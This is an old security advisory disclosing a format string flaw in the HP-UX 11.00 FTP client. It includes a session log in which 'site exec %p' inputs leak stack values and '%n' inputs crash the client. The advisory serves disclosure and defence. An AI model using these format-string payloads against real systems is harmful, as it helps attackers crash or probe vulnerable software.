[ SOURCE: http://www.secureroot.com/security/advisories/9790370532.html ]

HP/UX FTP format string vulnerability



A format string vulnerability exists in ftp. This vulnerability was

discussed with HP labs.



$ uname -a

HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs

$ ftp localhost

Connected to localhost.

220 localhost FTP server (Version 1.1.214.6 Wed Feb  9 08:03:34 GMT 2000) ready.

Name (localhost:zorgon):zorgon

331 Password required for zorgon.

Password:

230 User zorgon logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> site exec %p %p %p %p

200-40008f10 00000003 00000002 00000001

200  (end of '40008f10 00000003 00000002 00000001')

ftp> site exec %n %n %n %n

Bus error(coredump)

$



And the 'SITE' command is also vulnerable

...

ftp> site %p %p %p %p

500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.

ftp> site %n %n %n %n

Bus error(coredump)

$ file core

core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS



The character format strings are not being parsed correctly in the ftp client.

When HP labs fix the problem in the client, the result will be :



ftp>  site exec %n %n %n %n

--->  SITE exec %n %n %n %n

200-%n %n %n %n

200  (end of '%n %n %n %n')

ftp>



So in this case the ftpd server will not process the character format strings.

The fix will be made in the next release of the ftp client.



-------------------------------------

zorgon <zorgon@antionline.org>

http://www.nightbird.free.fr